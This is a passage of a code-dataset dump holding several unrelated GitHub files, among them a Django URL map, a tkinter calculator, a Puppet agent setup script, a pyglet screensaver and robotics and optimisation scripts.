project=project,\n datatype=datatype)\n\n def apply_to_accepted(\n self, template_map: Dict[str, Dict[str, TemplateProject]]) -> None:\n \"\"\"Applies the templates in the map to the accepted project in the\n group.\n\n Expects the accepted project to be named `accepted`.\n\n Args:\n template_map: map from datatype to stage to template project\n \"\"\"\n stage = 
'accepted'\n accepted_projects = self.__get_matching_projects(stage)\n if not accepted_projects:\n log.warning('no accepted stage project in center group %s',\n self.label)\n return\n\n self.__apply_to(template_map=template_map,\n project=accepted_projects[0],\n stage=stage,\n datatype='all')\n\n def __apply_to(self, *, template_map: Dict[str, Dict[str,\n TemplateProject]],\n project: ProjectAdaptor, stage: str, datatype: str):\n \"\"\"Applies the template map to the project for stage and datatype.\n\n Args:\n template_map: map from datatype to stage to template project\n project: the destination project\n stage: the stage for the destination\n datatype: the datatype for the destination\n \"\"\"\n stage_map = template_map.get(datatype)\n if stage_map:\n template_project = stage_map.get(stage)\n if template_project:\n template_project.copy_to(project,\n value_map={\n 'adrc': self.label,\n 'project_id': project.id,\n 'site': self.proxy().get_site()\n })\n\n def apply_template_map(\n self, template_map: Dict[str, Dict[str, TemplateProject]]) -> None:\n \"\"\"Applies the template map to the pipeline projects within the center\n group.\n\n Args:\n template_map: map from datatype to stage to template project\n \"\"\"\n for stage in self.__ingest_stages:\n self.apply_to_ingest(stage=stage, template_map=template_map)\n\n self.apply_to_accepted(template_map)\n","repo_name":"naccdata/flywheel-gear-extensions","sub_path":"common/src/python/centers/center_group.py","file_name":"center_group.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10783520419","text":"# App del módulo de proyectos de investigación - URL's para SIGEPI\n#Autor: Laura Sofía Rodríguez Castillo - ORCID: 0000-0001-7873-8716\n# Coautor(a): Milton O. 
Castro Ch.\n#fecha 07-07-2022\n\nfrom django.urls import path\nfrom django.contrib.auth.views import *\n#from rest_framework.routers import DefaultRouter\nfrom modpry.app_regpry.views import *\nfrom modpry.app_regpry.func import *\nfrom modpry.app_regpry.urls import *\nfrom modpry.app_modpry.views import *\nfrom modpry.app_modpry.urls import *\nfrom modpry.app_crono.views import *\nfrom modpry.app_crono.func import *\nfrom modpry.app_crono.urls import *\nfrom modpry.app_evapry.views import *\nfrom modpry.app_evapry.func import *\nfrom modpry.app_evapry.urls import *\nfrom modpry.app_conve.views import *\nfrom modpry.app_conve.func import *\nfrom modpry.app_conve.urls import *\nfrom modpry.app_convo.views import *\nfrom modpry.app_convo.func import *\nfrom modpry.app_convo.urls import *\nfrom modpry.app_disinv.views import *\nfrom modpry.app_disinv.func import *\nfrom modpry.app_disinv.urls import *\n#from modpry.app_gespry.views import *\n#from modpry.app_gespry.urls import *\n#from modpry.app_gespry.func import *\n#from modpry.app_mlog.views import *\n#from modpry.app_mlog.func import *\n#from modpry.app_mlog.urls import *\nfrom modpry.app_recur.views import *\nfrom modpry.app_recur.func import *\nfrom modpry.app_recur.urls import *\nfrom modpry.app_regprgi.views import *\nfrom modpry.app_regprgi.func import *\nfrom modpry.app_regprgi.urls import *\nfrom .models import *\n\nurlpatterns = [\n # ------------------------------ URL's para convenios --------------------\n path('inicio',vst_conve().vst_inicio, name = 'ini_conve'), #inicio de la app de convenios\n path('crearconve/',vts_reg_conve.as_view(), name = 'crea_conve'), #Crea el convenio \n path('cnconve/', vst_ls_conve.as_view(), name='cn_conve'), #Lista de convenios\n path('cndetconve/', vst_ls_detconve.as_view(), name = 'cn_det_conve'),# Información de un convenio\n path('editconve//',vts_edit_conve.as_view(), name = 'edit_conve'), #Actualizar convenio\n path('archiconve/',fn_archi_conve, name = 'archi_conve'), #Archivar un convenio\n path('eliconve/',fn_eli_conve, name = 'eli_conve'),#Eliminar un convenio\n\n #------------------------------- URL's para convocatorias -------------------\n path('inicio',vst_convo().vst_inicio, name = 'ini_convo'), #inicio de la app de convocatorias\n path('inicio',vst_convo().vst_inicio, name = 'ini_convo'), #inicio de la app de convocatoria\n path('crearconvo/',vts_reg_convo.as_view(), name = 'crea_convo'), #Crea la convocatoria \n path('cnconvo/', vst_ls_convo.as_view(), name='cn_convo'), #Lista de convocatorias\n path('cndetconvo/', vst_ls_detconvo.as_view(), name = 'cn_det_convo'), # Información de una convocatoria\n path('editconvo//',vts_edit_convo.as_view(), name = 'edit_convo'), #Actualizar convocatoria\n path('archiconvo/',fn_archi_convo, name = 'archi_convo'), #Archivar una convocatoria\n path('eliconvo/',fn_eli_convo, name = 'eli_convo'),#Eliminar una convocatoria\n\n #URL para las funciones de un cronograma\n path('inicio',vst_crono().vst_inicio, name = 'ini_crono'), #inicio de la app de cronograma\n #URL para cronogramas\n path('creacrono/',vst_crea_crono.as_view(), name = 'creacrono'), #Crear cronograma \n path('cncrono/',vst_ls_crono.as_view(), name = 'vercrono'),#Lista de cronograma\n path('addcrono/',vst_add_crono.as_view(), name = 'addcrono'),#Añadir al cronograma\n path('editcrono//',vst_edit_crono.as_view(), name = 'edit_crono'),#Editar cronograma\n path('archicrono//',fn_archi_crono, name = 'archi_crono'), #Archivar cronograma\n path('elicrono//',fn_eli_crono, name = 'eli_crono'), 
#Eliminar cronograma\n #URL para etapas\n path('creaeta/',vst_crea_etapa.as_view(), name = 'creaeta'), #Crear etapa de un cronograma\n path('cndetcrono/',vst_ls_etapa.as_view(), name = 'veretapa'),#Lista de etapas\n path('editeta//',vst_edit_etapa.as_view(), name = 'edit_etapa'),#Editar etapa\n path('archieta//',fn_archi_etapa, name = 'archi_etapa'), #Archivar etapa\n path('elieta//',fn_eli_etapa, name = 'eli_etapa'), #Eliminar etapa\n #URL para fases\n path('creafase/',vst_crea_fase.as_view(), name = 'creafase'), #Crear fase de una etapa\n path('cndetcrono/',vst_ls_fase.as_view(), name = 'verfase'),#Lista de fases\n path('editfase//',vst_edit_fase.as_view(), name = 'edit_fase'),#Editar fase\n path('archifase//',fn_archi_fase, name = 'archi_fase'), #Archivar fase\n path('elifase//',fn_eli_fase, name = 'eli_fase'), #Eliminar fase\n #URL para procesos\n path('creaproc/',vst_crea_proc.as_view(), name = 'creaproc'), #Crea el proceso de una fase\n path('cndetcrono/',vst_ls_proc.as_view(), name = 'verproc'),#Lista de procesos\n path('editproc//',vst_edit_proc.as_view(), name = 'edit_proc'),#Editar procesos\n path('archiproc//',fn_archi_proceso, name = 'archi_proc'), #Archivar proceso\n path('eliproc//',fn_eli_proceso, name = 'eli_proc'), #Eliminar proceso\n #URL para tareas\n path('creatar/',vst_crea_tarea.as_view(), name = 'creatar'), #Crea la tarea de un proceso\n path('cndetcrono/',vst_ls_tarea.as_view(), name = 'vertarea'),#Lista de tareas\n path('editar//',vst_edit_tarea.as_view(), name = 'edit_tarea'),#Editar tarea\n path('architar//',fn_archi_tarea, name = 'archi_tar'), #Archivar tarea\n path('elitar//',fn_eli_tarea, name = 'eli_tar'), #Eliminar tarea\n #URL para actividades\n path('creacti/',vst_crea_acti.as_view(), name = 'creacti'), #Crea la actividad de una tarea\n path('cndetcrono/',vst_ls_acti.as_view(), name = 'veracti'),#Lista de actividades\n path('editacti//',vst_edit_acti.as_view(), name = 'edit_acti'),#Editar actividad\n path('archiacti//',fn_archi_acti, name = 'archi_acti'), #Archivar actividad\n path('eliacti//',fn_eli_acti, name = 'eli_acti'), #Eliminar actividad\n\n #----------- URL's para la aplicación de diseño de proyecto de investigación ----------\n path('inicio',vst_disinv().vst_inicio, name = 'ini_disinv'), #inicio de la app de diseño de proyecto de investigación\n \n #URL para el registro de un diseño de investigación\n path('creadis/',vts_reg_dispry.as_view(), name = 'crea_dis'), #Crea el diseño de un proyecto \n path('cndis/', vst_ls_dispry.as_view(), name='cn_dispry'), #Lista de diseños de proyectos\n path('cndetdis/', vts_ls_detdis.as_view(), name='cn_det_dis'), #Añadir información del diseño de un proyecto\n path('editdis//',vts_edit_dispry.as_view(), name = 'edit_dis'), #Actualizar diseño de un proyecto\n path('archidis/',fn_archi_dis, name = 'archi_dis'), #Archivar un diseño de un proyecto\n path('elidis/',fn_eli_dis, name = 'eli_dis'),#Eliminar un diseño de un proyecto\n\n #URL para el registro de un tema\n path('createma/',vts_reg_tema.as_view(), name = 'crea_tema'), #Crea el tema\n path('cntema/', vst_ls_tema.as_view(), name='cn_tema'), #Lista de los tema\n path('editema//',vts_edit_tema.as_view(), name = 'edit_tema'), #Actualiza el tema\n path('architema/',fn_archi_tema, name = 'archi_tema'), #Archivar un tema\n path('elitema/',fn_eli_tema, name = 'eli_tema'),#Eliminar un tema\n\n #URL para el registro de una definición\n path('creadefin/',vts_reg_defi.as_view(), name = 'crea_defin_dis'), #Crea la definición\n path('cndefin/', vst_ls_defi.as_view(), 
name='cn_defin_dis'), #Lista de laa definiciones\n path('edirdefin//',vts_edit_defi.as_view(), name = 'edit_defin_dis'), #Actualiza una definición\n path('archidefin/',fn_archi_defi, name = 'archi_defin_dis'), #Archivar una definición\n path('elidefin/',fn_eli_defi, name = 'eli_defin_dis'),#Eliminar una definición\n\n #URL para el registro de un árbol de problemas\n path('creaap/',vts_reg_ap.as_view(), name = 'crea_arb_pro'), #Crea un árbol de problemas\n path('cnap/', vst_ls_ap.as_view(), name='cn_arb_pro'), #Lista los árboles de problemas\n path('edirap//',vts_edit_ap.as_view(), name = 'edit_arb_pro'), #Actualiza un árbol de problemas\n path('archiap/',fn_archi_ap, name = 'archi_arb_pro'), #Archivar un árbol de problemas\n path('eliap/',fn_eli_ap, name = 'eli_arb_pro'),#Eliminar un árbol de problemas\n\n #URL para el registro de un árbol de objetivos\n path('creaao/',vts_reg_ao.as_view(), name = 'crea_arb_obj'), #Crea un árbol de objetivos\n path('cnao/', vst_ls_ao.as_view(), name='cn_arb_obj'), #Lista los árboles de objetivos\n path('edirao//',vts_edit_ao.as_view(), name = 'edit_arb_obj'), #Actualiza un árbol de objetivos\n path('archiao/',fn_archi_ao, name = 'archi_arb_obj'), #Archivar un árbol de objetivos\n path('eliao/',fn_eli_ao, name = 'eli_arb_obj'),#Eliminar un árbol de objetivos\n\n #URL para el registro de causas\n path('creacau/',vts_reg_cau.as_view(), name = 'crea_causa'), #Crea una causa\n path('cncau/', vst_ls_cau.as_view(), name='cn_causa'), #Lista las causas\n path('edircau//',vts_edit_cau.as_view(), name = 'edit_causa'), #Actualiza una causa\n path('archicau/',fn_archi_cau, name = 'archi_causa'), #Archivar una causa\n path('elicau/',fn_eli_cau, name = 'eli_causa'),#Eliminar una causa\n\n #URL para el registro de un efecto\n path('creaefe/',vts_reg_efe.as_view(), name = 'crea_efecto'), #Crea un efecto\n path('cnefe/', vst_ls_efe.as_view(), name='cn_efecto'), #Lista las efecto\n path('editefe//',vts_edit_efe.as_view(), name = 'edit_efecto'), #Actualiza un efecto\n path('archiefe/',fn_archi_efe, name = 'archi_efecto'), #Archivar un efecto\n path('eliefe/',fn_eli_efe, name = 'eli_efecto'),#Eliminar un efecto\n\n #URL para el registro de un medio\n path('creamed/',vts_reg_med.as_view(), name = 'crea_medio'), #Crea un medio\n path('cnmed/', vst_ls_med.as_view(), name='cn_medio'), #Lista las medio\n path('editmed//',vts_edit_med.as_view(), name = 'edit_medio'), #Actualiza un medio\n path('archimed/',fn_archi_med, name = 'archi_medio'), #Archivar un medio\n path('elimed/',fn_eli_med, name = 'eli_medio'),#Eliminar un medio\n\n #URL para el registro de un fin\n path('creafin/',vts_reg_fin.as_view(), name = 'crea_fin'), #Crea un fin\n path('cnfin/', vst_ls_fin.as_view(), name='cn_fin'), #Lista las fin\n path('editfin//',vts_edit_fin.as_view(), name = 'edit_fin'), #Actualiza un fin\n path('archifin/',fn_archi_fin, name = 'archi_fin'), #Archivar un fin\n path('elifin/',fn_eli_fin, name = 'eli_fin'),#Eliminar un fin\n\n #-------------------- URL para las funciones de la evaluación de un proyecto --------\n path('inicio',vst_evapry().vst_inicio, name = 'inicio_pry'), #inicio de la app de proyectos\n #URL para la evaluación de un proyecto\n path('creaeva/', vst_reg_evapry.as_view(), name = 'crear_eva'), #Crear evaluación de un proyecto\n path('cneva/', vst_ls_evapry.as_view(), name = 'cn_evapry'), #Consultar evaluación de un proyecto\n path('addeva/', vst_add_eva.as_view(), name = 'add_eva'), #Añadir información a una evaluación de un proyecto\n 
path('editeva//',vst_edit_evapry.as_view(), name = 'edit_eva'), #Editar la evaluación de un proyecto\n path('archieva/',fn_archi_eva, name = 'archi_eva'), #Archivar la evaluación de un proyecto\n path('elieva/',fn_eli_eva, name = 'eli_eva'),#Eliminar la evaluación de un proyecto\n #URL para rúbrica de evaluación\n path('crearub/', vst_crear_rub.as_view(), name = 'crear_rub'), #Crear rúbrica\n path('cndeteva/', vst_ls_rub.as_view(), name = 'cn_rub'), #Consultar rúbrica\n path('editrub//',vst_edit_rub.as_view(), name = 'edit_rub'), #Editar la rúbrica de evaluación de un proyecto\n path('archirub/',fn_archi_rub, name = 'archi_rub'), #Archivar la rúbrica de evaluación de un proyecto\n path('elirub/',fn_eli_rub, name = 'eli_rub'),#Eliminar la rúbrica de evaluación de un proyecto\n #URL para criterio de evaluación\n path('creacrit/', vst_crear_crit.as_view(), name = 'crear_crit'), #Crear criterios de la rúbrica\n path('cndeteva/', vst_ls_crit.as_view(), name = 'cn_crit'), #Consultar criterios evaluación de un proyecto\n path('editcrti//',vst_edit_crit.as_view(), name = 'edit_crit'), #Editar el criterio de evaluación de un proyecto\n path('archicrit/',fn_archi_crit, name = 'archi_crit'), #Archivar el criterio de evaluación de un proyecto\n path('elicrti/',fn_eli_crit, name = 'eli_crit'),#Eliminar el criterio de evaluación de un proyecto\n #URL para rango de evaluación\n path('crearango/', vst_crear_rango.as_view(), name = 'crear_rango'), #Crear un rango de evaluación \n path('cndeteva/', vst_ls_rango.as_view(), name = 'cn_rango'), #Consultar rango de evaluación de un proyecto\n path('editrng//',vst_edit_rng.as_view(), name = 'edit_rng'), #Editar el rango de evaluación de un proyecto\n path('archirng/',fn_archi_rng, name = 'archi_rng'), #Archivar el rango de evaluación de un proyecto\n path('elirng/',fn_eli_rng, name = 'eli_rng'),#Eliminar el rango de evaluación de un proyecto\n #URL para resultado de evaluación\n path('crearesul/', vst_crear_resul.as_view(), name = 'crear_resul'), #Crear un resultado de evaluación\n path('cndeteva/', vst_ls_resultado.as_view(), name = 'cn_res'), #Consultar resultado de una evaluación de un proyecto\n path('editres//',vst_edit_res.as_view(), name = 'edit_res'), #Editar el rsultado de una evaluación de un proyecto\n path('archires/',fn_archi_res, name = 'archi_res'), #Archivar el resultado de evaluación de un proyecto, solo para el rol de evaluadores\n path('elires/',fn_eli_res, name = 'eli_res'),#Eliminar el resultado de evaluación de un proyecto\n #URL para tipo de evaluación\n path('creatipo/', vst_crear_tipoeva.as_view(), name = 'crear_tipo'), #Crear tipo de evaluación\n path('cndeteva/', vst_ls_tipoeva.as_view(), name = 'cn_tipoeva'), #Consultar tipo de evaluación de un proyecto\n path('editipo//',vst_edit_tipo.as_view(), name = 'edit_tipo'), #Editar el tipo de evaluación de un proyecto\n path('elitipo/',fn_eli_tipo, name = 'eli_tipo'),#Eliminar el tipo de evaluación de un proyecto\n #URL para definciónes, comentarios, ect, de evaluación\n path('creardefi/', vst_crear_defi.as_view(), name = 'crear_defi'), #Crear definición, comentario, recomendación\n path('cndeteva/', vst_ls_defi.as_view(), name = 'cn_defi'), #Consultar definciónes, comentarios, ect, de la evaluación de un proyecto\n path('editdefi//',vst_edit_defi.as_view(), name = 'edit_defi'), #Editar definciónes, comentarios, ect, de la evaluación de un proyecto\n path('archidefi/',fn_archi_defi, name = 'archi_defi'), #Archivar definciónes, comentarios, ect, de la evaluación de un proyecto\n 
path('elidefi/',fn_eli_defi, name = 'eli_defi'),#Eliminar definciónes, comentarios, ect, de la evaluación de un proyecto\n\n #URL's para la aplicación de gestión de proyecto de investigación\n #path('inicio',vst_gespry().vst_inicio, name = 'ini_gespry'), #inicio de la app de gestión de proyectos\n\n #URL's para la aplicación de marco lógico\n #path('inicio',vst_mlog().vst_inicio, name = 'ini_mlog'), #inicio de la app de marco lógico\n\n #------------------------- URL's para la aplicación de recursos -------------------\n path('inicio',vst_recur().vst_inicio, name = 'ini_recur'), #inicio de la app de recursos\n path('crearecu/',vts_reg_recu.as_view(), name = 'crea_recu'), #Crea el recurso \n path('cnrecu/', vst_ls_recu.as_view(), name='cn_recu'), #Lista de recursos\n path('cndetrecu/',vst_ls_detrecu.as_view(), name = 'cn_det_recu'),\n path('editrecu//',vts_edit_recu.as_view(), name = 'edit_recu'), #Actualizar recurso\n path('archirecu/',fn_archi_recu, name = 'archi_recu'), #Archivar un recurso\n path('elirecu/',fn_eli_recu, name = 'eli_recu'),#Eliminar un recurso\n\n # ------------- URL's para la aplicación de registro de programa de investigación------\n path('inicio',vst_regprgi().vst_inicio, name = 'ini_regprgi'), #inicio de la app de registro de programa de investigación\n path('creaprgi/',vts_reg_prgi.as_view(), name = 'crea_prgi'), #Crea el programa de investigación \n path('cnprgi/', vst_ls_prgi.as_view(), name='cn_prgi'), #Lista de programas de investigación\n path('cndetprgi/',vst_ls_detprgi.as_view(), name = 'cn_det_prgi'), #Información en detalle de un programa de investigación\n path('editprgi//',vts_edit_prgi.as_view(), name = 'edit_prgi'), #Actualizar un programa de investigación\n path('archiprgi/',fn_archi_prgi, name = 'archi_prgi'), #Archivar un programa de investigación\n path('eliprgi/',fn_eli_prgi, name = 'eli_prgi'),#Eliminar un programa de investigación\n\n # ------------------------- URL para registro de un proyecto -----------------------\n path('inireg',vst_regpry().vst_inicio, name = 'ini_regpry'), #inicio de la app de proyectos\n path('creapry/',vts_reg_pry.as_view(), name = 'crea_pry'), #Crea el proyecto \n path('cnpry/', vst_ls_pry.as_view(), name='cn_pry'), #Lista de proyectos\n path('cndetpry/', vst_ls_infopry.as_view(), name='cn_det_pry'), #Lista de la información de los proyectos\n path('editpry//',vts_edit_pry.as_view(), name = 'edit_pry'), #Actualizar proyecto\n path('archipry/',fn_archi_pry, name = 'archi_pry'), #Archivar un proyecto\n path('elipry/',fn_eli_pry, name = 'eli_pry'),#Eliminar un proyecto\n\n #URL para la información adicional de un proyecto\n path('addpry/',vts_add_pry.as_view(), name = 'add_pry'),#Añadir información del proyecto\n path('cninf/', vst_ls_infopry.as_view(), name = 'cn_infpry'),#Consultar información adicional de un proyecto\n path('editinf//', vts_edit_infpry.as_view(), name = 'edit_inf'),#Editar información de un proyecto\n path('archinf/',fn_archi_infpry, name = 'archi_inf_pry'), #Archivar la información adicional de un proyecto\n path('elinf/',fn_eli_infpry, name = 'eli_inf_pry'),#Eliminar la información adicional de un proyecto\n\n #URL para la información geográfica de un proyecto\n path('addgeo/',vts_reg_geo.as_view(), name = 'add_geo'),#Añadir información geográfica del proyecto\n path('cngeo/', vst_ls_geopry.as_view(), name = 'cn_geo'),#Consultar información geográfica de un proyecto\n path('editgeo//', vts_edit_geo.as_view(), name = 'edit_geo'),#Editar información geográfica de un proyecto\n 
path('archigeo/',fn_archi_geo, name = 'archi_geo'), #Archivar la información geográfica de un proyecto\n path('eligeo/',fn_eli_geo, name = 'eli_geo'),#Eliminar la información geográfica de un proyecto\n\n #URL para los eventos de un proyecto\n path('addeven/',vts_reg_even.as_view(), name = 'add_even'),#Añadir eventos de un proyecto\n path('cneven/', vst_ls_evenpry.as_view(), name = 'cn_even'),#Consultar eventos de un proyecto\n path('editeven//', vts_edit_even.as_view(), name = 'edit_even'),#Editar eventos de un proyecto\n path('archieven/',fn_archi_even, name = 'archi_even'), #Archivar eventos de un proyecto\n path('elieven/',fn_eli_even, name = 'eli_even'),#Eliminar eventos de un proyecto\n\n #URL para la línea de investigación\n path('addlninv/',vts_reg_lninv.as_view(), name = 'add_lninv'),#Añadir línea de investigación\n path('cnlninv/', vst_ls_lninv.as_view(), name = 'cn_lninv'),#Consultar línea de investigación\n path('editlninv//', vts_edit_lninv.as_view(), name = 'edit_lninv'),#Editar línea de investigación\n path('archilninv/',fn_archi_lninv, name = 'archi_lninv'), #Archivar línea de investigación\n path('elilninv/',fn_eli_lninv, name = 'eli_lninv'),#Eliminar línea de investigación\n\n]\n\n\n","repo_name":"ustabog/sigepi-usta","sub_path":"modpry/app_modpry/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":20207,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"1623693675","text":"from tkinter import *\n\n\ndef dugmeBas(p):\n global nokta\n if hesapText.get() == \"Hata!\":\n hesapText.set(\"\")\n\n if nokta == True and p==\".\":\n return\n\n if p == \".\":\n nokta = True\n\n if p in \"+-*/\":\n nokta = False\n\n hesapText.set(hesapText.get() + p)\n\n\ndef sil():\n hesapText.set(\"\")\n nokta = False\n\n\ndef hesapla():\n nokta = False\n try:\n hesapText.set(str(eval(hesapText.get())))\n except:\n hesapText.set(\"Hata!\")\n\n\nroot = Tk()\nroot.title(\"Muhteşem Calculator\")\nroot.geometry(\"-50+100\")\n\ndugmeBaslik = [\"7\", \"8\", \"9\", \"4\", \"5\", \"6\", \"1\", \"2\", \"3\"]\nnokta = False\n\nhesapText = StringVar()\nfont = ('digital-7', 30)\nEntry(root, font=font, textvariable=hesapText, bg=\"SteelBlue1\"). \\\n grid(row=0, column=0, columnspan=5, sticky=\"NEWS\", ipady=10)\n\nsayac = 0\nfor satir in range(1, 4):\n for sutun in range(0, 3):\n Button(root, command=lambda prm=dugmeBaslik[sayac]: dugmeBas(prm),\n text=dugmeBaslik[sayac], relief=GROOVE, width=10, height=4). 
\\\n grid(row=satir, column=sutun)\n sayac += 1\nButton(root, text=\"0\", relief=GROOVE, bg=\"IndianRed1\", height=4,\n command=lambda: dugmeBas(\"0\")).grid(row=4, column=0, columnspan=2, sticky=\"NEWS\")\nButton(root, text=\".\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\".\")).grid(row=4, column=2, sticky=\"NEWS\")\nButton(root, text=\"*\", relief=GROOVE, bg=\"IndianRed1\", width=10,\n command=lambda: dugmeBas(\"*\")).grid(row=1, column=4, sticky=\"NEWS\")\nButton(root, text=\"/\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\"/\")).grid(row=2, column=4, sticky=\"NEWS\")\nButton(root, text=\"+\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\"+\")).grid(row=3, column=4, sticky=\"NEWS\")\nButton(root, text=\"-\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\"-\")).grid(row=4, column=4, sticky=\"NEWS\")\n\nButton(root, text=\"C\", relief=GROOVE, bg=\"Red3\",\n command=sil).grid(row=0, column=5, sticky=\"NEWS\")\n\nButton(root, text=\"=\", relief=GROOVE, bg=\"lime green\",\n command=hesapla).grid(row=3, column=5, rowspan=2, sticky=\"NEWS\")\n\nroot.mainloop()\n","repo_name":"qpulsar/PythonDersleri","sub_path":"Bote2019Guz/52_calculator.py","file_name":"52_calculator.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"36901704132","text":"def countNegatives():\n \"\"\"\n Function that counts and reports how many values are negative\n in a sequence of integers entered by the user. Press 'Enter' \n to quit.\n\n Params: None\n\n Returns: Prints a string stating how many negative numbers. If \n there is more than one negative number a plural will be used for\n 'numbers'. \n \"\"\"\n # We will store our count of negative numbers in the sequence here.\n count = 0\n # While count is greater than or equal to 0 the loop will run, unless\n # the user presses only the enter key, in which case we print the count\n # of negative numbers and end the loop.\n while count >= 0:\n # We keep our input in this num variable as a string as we want to \n # test for Enter key input too, and convert to int where required.\n num = input(\"Enter a number: \")\n if num == \"\" and count == 1:\n # If the user exits (blank input) and count is 1 we return singular\n # negative number and break the loop.\n print(\"There is \" + str(count) + \" negative number.\")\n break\n # If the input is empty and count is 0, it will return 0 negative numbers.\n elif num == \"\" and count == 0:\n print(\"There are \" + str(count) + \" negative numbers.\")\n break\n # If the input is Enter only and count above 0, we print the plural including\n # count of negative nuumbers.\n elif num == \"\" and count > 0:\n print(\"There are \" + str(count) + \" negative numbers.\")\n break\n # If the input is a negative number, increment count.\n elif int(num) < 0:\n count += 1\n\ncountNegatives()","repo_name":"adamrichardturner/python-birkbeck","sub_path":"countNegatives.py","file_name":"countNegatives.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3988757893","text":"import logging\nfrom subprocess import check_output\n\n\ndef setup():\n hostname = check_output('hostname').strip()\n certname = hostname + '.nodes.bluesense.co'\n logging.debug('puppet agent certname will be set to: ' + certname)\n\n puppet_config_file_path = '/etc/puppetlabs/puppet/puppet.conf'\n 
puppet_config = '[main]\\n' \\\n 'server = puppet-fleet.bluesense.co\\n' \\\n '[agent]\\n' \\\n 'certname = ' + certname + '\\n'\n\n file(puppet_config_file_path, 'w').write(puppet_config)\n\n check_output(['systemctl', 'enable', 'puppet'])\n check_output(['systemctl', 'start', 'puppet'])\n\n","repo_name":"blueSense/hub-bsntools","sub_path":"bsntools/firstboot/puppet.py","file_name":"puppet.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27290056991","text":"from os import environ\nfrom cpt.packager import ConanMultiPackager\n\n\nif __name__ == \"__main__\":\n builder = ConanMultiPackager(\n\tremotes=\"https://api.bintray.com/conan/inexorgame/inexor-conan\",\n\tbuild_policy=\"missing\")\n builder.add_common_builds(pure_c=False)\n builder.run()\n","repo_name":"borune-k12/conan-etcd-grpc","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9896013955","text":"import pyglet\nfrom neon import NeonApp\n\nclass ScreensaverApp(NeonApp):\n \"\"\"This example is a terribly written screensaver app. Text bounces around\n the window. The implemenation is not finished because Neon apps do no\n currently initalize pyglet objects when receiving window information. That\n feature should be added sometime shortly.\"\"\"\n\n def on_init(self):\n # Initialize a text widget to move around\n self.text = pyglet.text.Label(\"Screensaver\", color=(255,0,0,255), anchor_x=\"center\", anchor_y=\"center\")\n self.text.x = self.x\n self.text.y = self.y +self.h\n self.widgets.append(self.text)\n self.direction = 0\n\n def on_draw(self):\n\n move = 1\n\n if self.direction == 0: #up/right\n self.text.x += move\n self.text.y += move\n\n if self.text.x >= self.x+self.w:\n self.direction = 3\n\n if self.text.y >= self.y+self.h:\n self.direction = 1\n\n elif self.direction == 1: #down/right\n self.text.x += move\n self.text.y -= move\n\n if self.text.x >= self.x+self.w:\n self.direction = 2\n\n if self.text.y < self.y:\n self.direction = 0\n\n elif self.direction == 2: #down/left\n self.text.x -= move\n self.text.y -= move\n\n if self.text.x < self.x:\n self.direction = 1\n\n if self.text.y < self.y:\n self.direction = 3\n\n elif self.direction == 3: #up/left\n self.text.x -= move\n self.text.y += move\n\n if self.text.x < self.x:\n self.direction = 0\n\n if self.text.y >= self.y+self.h:\n self.direction = 2\n\n self.text.draw()\n\n","repo_name":"excid3/neon","sub_path":"apps/screensaver_app.py","file_name":"screensaver_app.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"3351469699","text":"import numpy as np\nimport pandas as pd\nimport json\nimport argparse\nimport os\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--result_dir', required=True, type=str)\n args = parser.parse_args()\n return args\n\n\ndef evaluate_results(df):\n stats = {}\n df_timeout = df.loc[df['limit'] == df['step_count']]\n df_success = df.loc[df['success']]\n indices = []\n for info in df['info']:\n if type(info) is str:\n info = eval(info)\n indices.append(info[1] == 'ur5_robotiq' and info[2] == 'ur5_robotiq')\n else:\n indices.append(False)\n df_robot_collision = df.loc[indices]\n\n indices = []\n for info in df['info']:\n if type(info) is str:\n 
info = eval(info)\n indices.append(info[2] == 'plane')\n else:\n indices.append(False)\n df_plane_collision = df.loc[indices]\n n_valid_exps = len(df_success) + len(df_robot_collision) + len(df_plane_collision)\n\n stats['num_exps'] = len(df)\n stats['num_valid_exps'] = n_valid_exps\n stats['num_success'] = len(df_success)\n stats['avg_steps'] = df_success.mean().step_count\n stats['num_plane_collision'] = len(df_plane_collision)\n stats['num_robot_collision'] = len(df_robot_collision)\n stats['num_timeout'] = len(df_timeout)\n stats['success_rate'] = stats['num_success'] / stats['num_valid_exps']\n return stats\n\nif __name__ == \"__main__\":\n args = get_args()\n result_filepath = os.path.join(args.result_dir, 'results.csv')\n df = pd.read_csv(result_filepath, index_col=0)\n stats = evaluate_results(df)\n print(json.dumps(stats, indent=4))","repo_name":"columbia-ai-robotics/decentralized-multiarm","sub_path":"demo/evaluate_results.py","file_name":"evaluate_results.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"9730172439","text":"from pymoo.algorithms.soo.nonconvex.ga import GA\nfrom pymoo.problems import get_problem\nfrom pymoo.optimize import minimize\nfrom pb import display_helper\n\nproblem = get_problem(\"sphere\")\n\nalgorithm = GA(pop_size=100)\nmonitor=display_helper.SOGraphMonitor(minimize=True)\nres = minimize(problem,\n algorithm,\n ('n_gen', 50),\n seed=1,\n callback=monitor,\n verbose=True)\nmonitor.persist()","repo_name":"axlhtm/Hydroinformatics","sub_path":"Urban 